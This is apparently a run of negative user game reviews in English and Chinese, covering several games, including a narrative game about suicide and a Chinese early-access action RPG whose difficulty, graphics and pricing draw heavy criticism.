Keep your bucks for another thing if you were looking for a cooperation game.
There are better alternatives
Buggy, reptitive, unoptimized.
Fun for...10 minutes?
Decide what you would pay for 10 minutes of 'fun' and then consider another game.
I was invested in this game when I started playing it, but after a while it got extremely cheesy and unaware of itself.
Between all of the joke characters and the really corny ending, this game just really isn't all that good.
There's so many more things that could have made it better.
Like, why can't we as the player have more of a response than in those letters?
Why is there basically no punishment for running out of money?
Why is the main characters sanity shown liniarly instead of diegetically through the way he interacts with people?
Why is there this unstoppable death cult?
The worst thing about it is that the game says the goal isn't to save everyone, but just to 'make you think'.
That kinda sounds like ♥♥♥♥♥♥♥♥ to me when the entire point of the game is to save everyone, and the game **punishes** you for not saving everyone, through both the gameplay and the achievements.
If there were more to the game than just pressing dioluoge options, I could understand helping people not being the only point.
This could have been a game that explores what happens to a man pushed to the edge, trying everything he can to fix everything and save everyone-- without caring for himself.
It could have taken a realistic, mature, apropriate look at suicide.
But instead, it feels like I'm playing a .exe game off of gamejolt.
The worst thing is that this game had soooo much potential, but it feels like a joke after everything is said and done.
If you want to play a game that takes a far better aproach to dealing with suicide, try missed messages., or Don't Take This Risk.
Those games take suicide 100% seriously, this game just uses it.
This game should be free.
I bought it and refunded it after 30 mins of game time played, althought I said I spent a total of 80 mins playing, the other 50 are searching for opponents.
Things I enjoyed: -the stealth parts (which weren't many but enjoyable enoughThings I didn't like:-lack of variety in combat-boring environment-bland storytellingI liked the fact that they chose to introduce a lesser-known legend (especially for people from outside the Netherlands), but I wish they could've done more in terms of gameplay.
Even the achievements were hardly motivating.
画质太差 无法操作 根本无法游戏  只能用手柄玩
Potential but seem very unfinished
Meh
最新看法：煞笔设定，只要对方一套你必死 你几套对面都不死的脑残设定，你们对难度的理解就是这个？对面数值碾压主角，主角只有不断猥琐才有可能赢得设定叫高难度？？？？呵呵，等你们什么时候明白玩家希望高难度是敌人的操作 技巧 走位优秀 而不是单纯的数值碾压，你们才能做出好游戏，可惜你们不明白！垃圾！最无语的是只要对面砍中你一下直接就不能动了，连着砍，一套下来必死，而我砍敌人，敌人一直在挨打突然就能霸体反击，为什么玩家就不能有这种设定，高难度难道就意味着敌人拥有各种bug恶心主角没有的设定？你们对不起你们的配音演员！你们对不起你们的配音演员！你们对不起你们的配音演员！头一回觉得声优是A+, 游戏质量是F，这个游戏也算开创先河了Don't buy this one!
The quality of this product is terrible, many people would like to talk about the catastrophic optimisation of this game, but I would rather say the base of game is a disaster as well, poor content with damn system settings, the architecture of this game is ♥♥♥♥♥♥!
Someone says this game is cheap, so it's worth.
The opinion like this is just hiliarious, they gave this price because they are not able to do a better game with higher price.
This is the reason of low price.
你们这游戏做得都配不上配音演员！！！1.
首先开局就搞黄色？？？？？？开发团队品味这么low得吗？？？？就算策划审美有毛病你们这些开发的没点审美？而且这av画质，还比不上前年的神舞幻想，网游水准都不够。这建模也无语，无论是画质还是建模被神舞幻想 古剑三吊打，这还大作呢，过分了吧  本着支持国产的心态，上来就给我泼桶凉水。要是之后的剧情再这么low得话真没救了2.
其次也别跟我说什么Early Access, 你后期再optimize再debug也不可能把建模 画质之类的硬伤改进，除非你把架构reconstruct，这样的话成本不说翻倍吧起码得提升一半，所以根本不可能有太大改进，小bug可以改，但这个游戏的问题在于需要重做的系统机制也好 画面也好，各种大硬伤太多，小error之类的反而无关紧要3.这么渣的画质还卡顿掉帧.......无语了4.也别说什么50块的游戏还能有多高要求，首先3D游戏定这么低的价我想是基于开发者团队水平来定的，你要是团队水平高自然也就定高价，退一万步说说这点钱算个p，你要是做成非常完整不错的一个成品，别说50， 500我都买，游戏不能因为定价而降低它的品质！你们的定价是因为对你们的能力做了妥协，从而影响品质BTW我也是developer，但我不是做游戏的，做ML的，做学术的，想看看国内游戏的开发者到了何等水平，就这样，没救了You really have to recruit more sophisticated pro gaming developers to refine your product!
this is a gdflmdf kmcjx game i hate it so much that why i did this jidfbkhijubgh
